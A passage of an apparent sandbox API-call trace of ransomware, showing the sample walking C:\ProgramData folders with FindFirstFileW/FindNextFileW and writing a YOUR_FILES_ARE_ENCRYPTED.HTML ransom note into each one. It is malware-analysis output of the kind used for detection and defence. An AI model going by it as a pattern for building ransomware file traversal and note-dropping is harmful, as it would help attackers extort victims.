hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.504] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.504] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.504] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.504] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.504] GetProcessHeap () returned 0x270000 [0157.505] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Profiles", cAlternateFileName="")) returned 0 [0157.505] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.506] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0157.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.506] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.509] CloseHandle (hObject=0x58c) returned 1 [0157.509] GetProcessHeap () returned 0x270000 [0157.511] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.512] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0157.512] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0157.512] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0157.512] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0157.513] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0157.515] CloseHandle (hObject=0x4a4) returned 1 [0157.516] GetProcessHeap () returned 0x270000 [0157.517] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0157.517] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0157.518] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned 37 [0157.518] GetProcessHeap () returned 0x270000 [0157.518] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0157.518] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Microsoft OneDrive" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive" [0157.518] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*" [0157.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0157.519] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.519] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 1 [0157.519] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned 43 [0157.520] GetProcessHeap () returned 0x270000 [0157.520] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.520] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" [0157.520] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*" [0157.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.520] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.520] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.520] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.520] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0157.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.521] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.523] CloseHandle (hObject=0x58c) returned 1 [0157.524] GetProcessHeap () returned 0x270000 [0157.525] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.525] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 0 [0157.525] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0157.525] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0157.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0157.526] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0157.528] CloseHandle (hObject=0x4a4) returned 1 [0157.528] GetProcessHeap () returned 0x270000 [0157.530] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0157.530] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0157.530] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache") returned 32 [0157.530] GetProcessHeap () returned 0x270000 [0157.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0157.530] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Package Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache") returned="\\\\?\\C:\\ProgramData\\Package Cache" [0157.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*" [0157.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0157.530] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.530] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="564F02E6419B9858949B0CD5A65E2C8C0944DD88", cAlternateFileName="564F02~1")) returned 1 [0157.530] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned 73 [0157.530] GetProcessHeap () returned 0x270000 [0157.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.530] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" [0157.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*" [0157.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.531] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.531] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.531] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned 82 [0157.531] GetProcessHeap () returned 0x270000 [0157.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.531] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" [0157.531] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*" [0157.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.532] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.532] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0157.532] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned 88 [0157.532] GetProcessHeap () returned 0x270000 [0157.532] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.534] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" [0157.534] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*" [0157.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.535] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.535] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0157.535] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned 92 [0157.535] GetProcessHeap () returned 0x270000 [0157.535] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.536] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" [0157.536] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 